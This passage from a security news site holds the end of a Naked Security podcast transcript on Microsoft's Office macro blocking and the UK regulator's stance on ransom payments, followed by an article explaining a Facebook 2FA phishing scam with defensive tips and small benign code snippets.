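assert defang("no triggers here") == "no triggers here"
```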


DOUG.  Great!

All right, check that out: that article is on nakedsecurity.sophos.com.

Now, we come to my favorite article of the week, because it offers a brief history of Office macros, and then a little back-and -forth wherein everyone seemingly was saying, “Come on, Microsoft! Do this thing”…

…and then Microsoft did the thing, and then everyone’s saying, “Why did you do that?”


DUCK.  Yes!

You may have oversimplified slightly… or at least you’ve left out the key thing: it took 20 years for Microsoft to get around to putting this feature in, but only 20 weeks to go, “Oh, golly, we’re taking it out again!”

I don’t think *everybody* told them to remove it… I just think that there was an unfortunate side-effect that hit not a majority, but a sufficiently vocal small minority, so Microsoft had to go, “OK, we’re backing this off for a bit, but watch this space, we’ll be back! We meant to put this feature in, and we now intend to. It took us 20 years to think about it. We won’t be diverted at this stage.”

And that feature is that if you receive an Office file of a certain type (in particular Word, Excel and PowerPoint files, amongst others)… if you receive such a file that contains macros (executable Visual Basic for Applications code), and the file came off the internet, then *the macros just won’t work*.

Initially, in the early days, hey, they just worked whenever, and that was clearly a disaster.

And then Microsoft tightened things up a bit, and they said, “If it came off the Internet, we’ll pop up a warning and you’ll have to go, Yes, I really want to do this.”

And we’ll have a non-default feature that well-informed sysadmins can use, saying, “No, I don’t want to *ask*, I want to *tell* users: Sorry, you can’t do it.”

And finally Microsoft decided, “You know what, it seems that when you have this non-default feature turned on, it greatly reduces the risk that you will get phished using documents with macros in, so we’re going to make it the default.”

And that was the change they announced… I think we spoke about on the podcast, what was it, back in February or March 2022?

And they implemented it, but it turned out, like you said, that you can please some of the people some of the time, but not all of the people all of the time!

[LAUGHTER]

And in this case, for better or for worse, I guess the squeaky wheel got the oil, because what some people are saying is, “No, this is a step too far! How dare you protect me from myself?”

[LAUGHTER]

So there we are.

But, like I said, Microsoft is apparently insisting, “This feature is coming back!”

Myself, I wish they could have done this 20 years ago.


DOUG.  Given that this is again not on by default, you can take steps to lock this down yourself.


DUCK.  If you have a Windows network where you can use Group Policy, for example, then as an administrator you can turn this function on to say, “As a company, we just don’t want macros off the internet. We’re not going to even offer you a button that you can say, Why not? Why not let the macros run?”

But if you’re a smaller business, just with a few people working together, and you’re working with cloud-based services, including Microsoft cloud services, it may not be quite so easy.

You can apply Group Policy protections by editing the registry on your own computer… it’s not that hard, but there isn’t just a magic button you can easily press to do it if you want.
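For what it’s worth, the policy value behind this setting is documented by Microsoft as blockcontentexecutionfrominternet, and a registry fragment for Word under Office 2016/Microsoft 365 (the 16.0 hive) looks roughly like this, with sibling keys existing for Excel and PowerPoint. Do verify the exact paths against Microsoft’s current documentation before deploying:

```reg
Windows Registry Editor Version 5.00

; Block macros in Word documents that came off the internet
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Word\Security]
"blockcontentexecutionfrominternet"=dword:00000001
```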

So, if you’re a small business, I would just suggest that you read about this, learn what the change is meant to do for you, and see if you can accommodate it for when it comes back.

Because all the evidence suggests that this does make a useful impact on document-based phishing where crooks use documents to sneak dodgy code into the company and then trick you into running it by going, “Yes, you need to click this to decrypt the document, or to un-copyprotect it, or to reveal the hidden content.”

And, lo and behold, you press the button; you authorise something that you shouldn’t have… after which, bad stuff happens and next thing you know, your computer is being invaded.

So it seems that as a protective vehicle, it does work.

It’s just ironic that what I was almost ready to describe as “Too little, too late” ended up, for some people, being “Too much, too soon.”

But we’ll get there in the end, I think… just hang in there if you don’t yet quite know what to do.


DOUG.  All right, we will keep an eye on that.

And last, but certainly not least, is a story about paying ransomware crooks.

So… I have a business; I get hit with ransomware; I get regulators coming after me saying, “You got hit by ransomware, you’re in big trouble for not protecting people’s data”… and I say, “But I paid the ransom, that’s got to be worth something, right?”


DUCK.  Yes. I must admit, I was quite surprised that this became the deal that it was, but I thought it was important to remind people about it.

Now, it’s a UK-specific story, as it stands, because it’s an open letter that came from the UK Information Commissioner’s Office (ICO), backed by the National Cyber Security Centre (NCSC), which is part of GCHQ, the UK’s signals intelligence agency.

It’s an open letter to attorneys, to lawyers, around the UK, and I suspect that there will be many other countries where lawyers, perhaps understandably, are kind of thinking along these lines… of saying to people, “Look, if you’re stuck with paying the ransom to get the data back, and it’s going to get the business going again, it’s not illegal. And given that’s the negotiation that the crooks want to do, so they don’t leak the data, we can’t for the life of us see why that would make the regulator more cross than if you just showed the middle finger to the crooks, and they did leak the data and bad things happened.”

Thus this open letter – like I said, specific to the UK, but there may be other countries where people are thinking along these lines.

And, as the Information Commissioner’s Office very bluntly put it:

“It has been suggested to us that a belief persists that payment of a ransom may protect the stolen data and/or result in a lower penalty by the regulator should it undertake an investigation.”

[LAUGHS]

But here’s the kicker:

We would like to be clear that this is not the case. […] For the avoidance of doubt, the Information Commissioner’s Office does not consider the payment of monies to criminals who have attacked a system as mitigating the risk to individuals, and this will not reduce any penalties incurred.

Paying the crooks for getting you out of the hole that the crooks dug you into… it’s not a security precaution!

Who knew, Doug?

[LAUGHTER]


DOUG.  Seriously…

And you do say in the article… I thought this was interesting, you are reasonable about this: “If it’s likely to be the only hope of saving your business and keeping your staff and their jobs, it seems fair to consider paying up as a sort of necessary evil.”


DUCK.  The regulator in the UK is saying it’s not automatically unlawful to pay ransomware demands.

In the UK, there’s no actual law that says: if you do it, you’re a criminal yourself.

Although the ICO says it hopes, as far as it can, that you don’t pay up, it can’t stop you. But remember, particularly in the current era, that there may be reasons why you could nevertheless get into trouble for paying, because of what they call the “relevant sanctions regulations, particularly those related to Russia.”

Although it’s not blanket unlawful to pay ransoms in general in the UK (I don’t know whether any countries have that rule yet), there may be cases where you are not supposed to pay or not *allowed* to pay for other reasons… because of where the money is going.

And, of course, if you do pay, then you have little choice but to risk being in trouble for that.

So the regulators are warning you that, although you may want to pay with the deepest dread in your heart… do your very best to avoid doing so!

And, of course, all those other reasons that we spoke about when we talked about this year’s Sophos Ransomware Survey

Basically, paying up should only ever be a last resort.

What were the stats in our latest survey? A third of the people only got half their data back. (They don’t get to choose which half it is, by the way!)

That’s the important thing to remember… and at least some of the people who paid up got nothing at all.

And very few of the people who did pay up actually got everything back.

So the idea that, “I will pay – obviously, it’ll at least get my business running again, and the regulator might go, ‘Well, at least you tried to make the best of a bad job’”…

The first part doesn’t work that way.

You might get absolutely nothing at all after you paid the money.

Colonial Pipeline spent, what, $4.4 million, was it?

And what did they get? A decryptor that was so slow they couldn’t even use it – they just went for their backups anyway, which they could have done, and kept $4.4 million in their pocket.

And as for the second part… the regulator is not going to thank you for paying the money and say, “Gosh, what a thoughtful person you were.”

The least they’re going to do is say, “Irrelevant. You didn’t look after the data properly; you didn’t mitigate the risk as you should. Let’s talk about what we’re going to do to punish you, and make sure you don’t do it again.”


DOUG.  Very good… you can read more about that on the site nakedsecurity.sophos.com.

And as the sun slowly begins to set on our show for this week, it’s time to hear from one of our readers on the Office Macros article.

Keith writes:

“If companies rely on receiving macro-embedded documents from the internet, and accept the risk, they should be the ones that enable it by group policy. Protect the many and force them to allow security exceptions.”

I think that’s a sentiment that’s probably shared by others as well.


DUCK.  Yes.

My first thought when I saw that comment… well, apart from hitting the approve button immediately [LAUGHTER] was, “That’s how it should be.”

Shouldn’t even need to say it… in the same way that who would have thought you need to send a letter to lawyers saying, “Hey, paying the ransom isn’t a good thing to do”!

My gut feeling is that what’s happened with Microsoft is they found that small businesses, including those who are actually keen to adopt Microsoft’s own cloud solutions, are finding that this is actually harder to handle than they would ever have thought.

So maybe, for a while, the bigger companies just have to go, “OK, we’ll use Group Policy; we know how to do that. We’ll just turn this on and leave it on.”

If you do have it on already, by the way, then this change… I don’t think it will make any difference, because the protection would already have been on; and although it’s now off by default, it won’t be off on your network.

But the sentiment is absolutely correct.

If there are people who go, “You can’t do that”… the sort of people who say, “I’m not going to put lights on my bicycle. That’s my business, not yours. If you run me over and squash me flat, that’s my problem,” they’re forgetting about the fact that there are all these knock-on effects to the rest of the community when they do things that are insecure.

So I agree: ideally, when we finally decide this is a security feature that’s working out so well we’re going to turn it on for everybody, I absolutely agree that it should be a non-contentious change.

But, like we said earlier in the podcast, it looks as though Microsoft is hoping for just a few weeks of rethinking this.

Though, as we know, the problem with thinking about software things “for a few weeks” is… where does few end and many start?

Is that six weeks, or is 56 weeks “a few”?

When lockdown started, did you think it was going to be 104 weeks, two years, or did you think, “Probably three, maybe eight?”

[LAUGHTER]

In this case, let’s hope that we finish up in a situation where it’s “all’s well that ends well”, and that the default does become more secure for everybody, except for those who insist on turning the feature *off*.


DOUG.  All right, very good.

Thank you for the comment, Keith!

And if you have an interesting story, comment or question you’d like to submit, we’d love to read it on the podcast.

You can email tips@sophos.com; you can comment on any one of our articles; or hit us up on social: @nakedsecurity.

That’s our show for today; thanks very much for listening…

For Paul Ducklin, I’m Doug Aamoth, reminding you: until next time…


BOTH.  Stay secure!

[MUSICAL MODEM]


Facebook 2FA scammers return – this time in just 21 minutes

Have you ever come really close to clicking a phishing link simply through coincidence?

We’ve had a few surprises, such as when we bought a mobile phone from a click-and-collect store a couple of years back.

Having lived outside the UK for many years before that, this was our first-ever purchase from this particular business for well over a decade…

…yet the very next morning we received an SMS message claiming to be from this very store, advising us we’d overpaid and that a refund was waiting.

Not only was this our first interaction with Brand X for ages, it was also the first-ever SMS (genuine or otherwise) we’d ever received that mentioned Brand X.

What’s the chance of THAT happening?

(Since then, we’ve made a few more purchases from X, ironically including another mobile phone following the discovery that phones don’t always do well in bicycle prangs, and we’ve had several more SMS scam messages targeting X, but they’ve never lined up quite so believably.)

Let’s do the arithmetic

Annoyingly, the chances of scam-meets-real-life coincidences are surprisingly good, if you do the arithmetic.

After all, the chance of guessing the winning numbers in the UK lottery (6 numbered balls out of 59) is an almost infinitesimally tiny 1-in-45-million, computed via the formula known as 59C6, or 59 choose 6, which is 59!/6!(59-6)!, which comes out as (59×58×57×56×55×54)/(6×5×4×3×2×1) = 45,057,474.
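If you’d rather let the computer do the arithmetic, Python’s standard library can confirm it:

```python
from math import comb, factorial

# "59 choose 6": the number of possible UK lottery draws
draws = comb(59, 6)
assert draws == factorial(59) // (factorial(6) * factorial(53))
print(draws)  # 45057474, i.e. roughly 1-in-45-million jackpot odds
```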

That’s why you’ve never won the jackpot…

…even though quite a few people have, over the many years it’s been going.

In the same way, phishing crooks don’t need to target or trick you, but merely to trick someone, and one day, maybe, just maybe, that someone might be you.

We had a weird reminder of this just last night, when we were sitting on the sofa, idly reading an article in tech publication The Register about 2FA scamming.

The first surprise was that at the very moment we thought, “Hey, we wrote up something like this about two weeks ago,” we reached the paragraph in the El Reg story that not only said just that, but linked directly to our own article!

What’s the chance of THAT happening?

Of course, any writer who says they’re not bothered whether other people notice their work or not is almost certainly not to be trusted, and we’re ready to admit (ahem) that we took a screenshot of the relevant paragraph and emailed it to ourselves (“purely for PR documentation purposes” was the explanation we decided on).

Now it gets weirder

Here’s where the coincidence of coincidences gets weirder.

After sending the email from our phone to our laptop, we moved less than two metres to our left, and sat down in front of said laptop to save the attached image, only to find that during the couple of seconds we were standing up…

…the VERY SAME CROOKS AS BEFORE had emailed us yet another Facebook Pages 2FA scam, containing almost identical text to the previous one:

What’s the chance of THAT happening, combined with the chance of the previous coincidence that just happened while we were reading the article?

Sadly, given the ease with which cybercriminals can register new domain names, set up new servers, and blast out millions of emails around the globe…

…the chance is high enough that it would be more surprising if this sort of coincidence NEVER happened.

Small changes to the scam

Interestingly, these crooks had made modest changes to their scam.

Like last time, they created an HTML email with a clickable link that itself looked like a URL, even though the actual URL it linked to was not the one that appeared in the text.

This time, however, the link you saw if you hovered over the blue text in the email (the actual URL target rather than the apparent one) really was a link to a URL hosted on the facebook.com domain.

Instead of linking directly from their email to their scam site, with its fake password and 2FA prompts, the criminals linked to a Facebook Page of their own, thus giving them a facebook.com link to use in the email itself:

This one-extra-click-away trick gives the criminals three small advantages:

  • The final dodgy link isn’t directly visible to email filtering software, and doesn’t pop up if you hover over the link in your email client.
  • The scam link draws apparent legitimacy from appearing on Facebook itself.
  • Clicking the scam link somehow feels less dangerous because you’re visiting it from your browser rather than going there directly from an email, which we’ve all been taught to be cautious about.

We didn’t miss the irony, as we hope you won’t either, of a totally bogus Facebook Page being set up specifically to denounce us for the allegedly poor quality of our own Facebook Page!

From this point on, the scam follows exactly the same workflow as the one we wrote up last time:

Firstly, you’re asked for your name and other reasonable-sounding amounts of personal information.

Secondly, you need to confirm your appeal by entering your Facebook password.

Finally, as you might expect when using your password, you’re asked to put in the one-time 2FA code that your mobile phone app just generated, or that arrived via SMS.

Of course, as soon as you provide each data item in the process, the crooks are using the phished information to log in, in real time, as if they were you, so they end up with access to your account instead of you.

Last time, just 28 minutes elapsed between the crooks creating the fake domain they used in the scam (the link they put in the email itself) and the scam email reaching us, which we thought was pretty quick.

This time, it was just 21 minutes, though, as we’ve mentioned, the fake domain wasn’t used directly in the bogus email we received, but was placed instead on an online web page hosted, ironically enough, as a Page on facebook.com itself.

We reported the bogus Page to Facebook as soon as we found it; the good news is that it’s now been knocked offline, thus breaking the connection between the scam email and the fake Facebook domain:

What to do?

Don’t fall for scams like this.

  • Don’t use links in emails to reach official “appeal” pages on social media sites. Learn where to go yourself, and keep a local record (on paper or in your bookmarks), so that you never need to use email web links, whether they’re genuine or not.
  • Check email URLs carefully. A link with text that itself looks like a URL isn’t necessarily the URL that the link directs you to. To find the true destination link, hover over the link with your mouse (or touch-and-hold the link on your mobile phone).
  • Don’t assume that all internet addresses with a well-known domain are somehow safe. Domains such as facebook.com, outlook.com or play.google.com are legitimate services, but not everyone who uses those services can be trusted. Individual email accounts on a webmail server, pages on a social media platform, or apps in an online software store all end up hosted by platforms with trusted domain names. But the content provided by individual users is neither created by nor particularly strongly vetted by that platform (no matter how much automated verification the platform claims to do).
  • Check website domain names carefully. Every character matters, and the business part of any server name is at the end (the right-hand side in European languages that go from left-to-right), not at the beginning. If I own the domain dodgy.example then I can put any brand name I like at the start, such as visa.dodgy.example or whitehouse.gov.dodgy.example. Those are simply subdomains of my fraudulent domain, and just as untrustworthy as any other part of dodgy.example.
  • If the domain name isn’t clearly visible on your mobile phone, consider waiting until you can use a regular desktop browser, which typically has a lot more screen space to reveal the true location of a URL.
  • Consider a password manager. Password managers associate usernames and login passwords with specific services and URLs. If you end up on an imposter site, no matter how convincing it looks, your password manager won’t be fooled because it recognises the site by its URL, not by its appearance.
  • Don’t be in a hurry to put in your 2FA code. Use the disruption in your workflow (e.g. the fact that you need to unlock your phone to access the code generator app) as a reason to check that URL a second time, just to be sure, to be sure.
  • Consider reporting scam pages to Facebook. Annoyingly, you need to have a Facebook account of your own to do so (non-Facebook users are unable to submit reports to help the greater community, which is a pity), or to have a friend who will send in the report for you. But our experience in this case was that reporting it did work, because Facebook soon blocked access to the offending Page.
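The “business part of the name is at the end” rule from the list above can be sketched as a whole-label suffix check. This is illustrative only; real-world code should lean on a proper public-suffix library rather than this hypothetical helper:

```python
def belongs_to(hostname: str, trusted_domain: str) -> bool:
    # Match whole labels from the right-hand end, where the real owner lives.
    host = hostname.lower().rstrip(".").split(".")
    trusted = trusted_domain.lower().rstrip(".").split(".")
    return len(host) >= len(trusted) and host[-len(trusted):] == trusted

# A famous brand at the *start* of a name proves nothing:
assert belongs_to("visa.dodgy.example", "dodgy.example")                 # crook-controlled
assert not belongs_to("whitehouse.gov.dodgy.example", "whitehouse.gov")  # just a subdomain trick
assert belongs_to("www.facebook.com", "facebook.com")                    # genuine subdomain
assert not belongs_to("notfacebook.com", "facebook.com")                 # whole labels only
```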

Remember, when it comes to personal data, especially passwords and 2FA codes…

If in doubt/Don’t give it out.

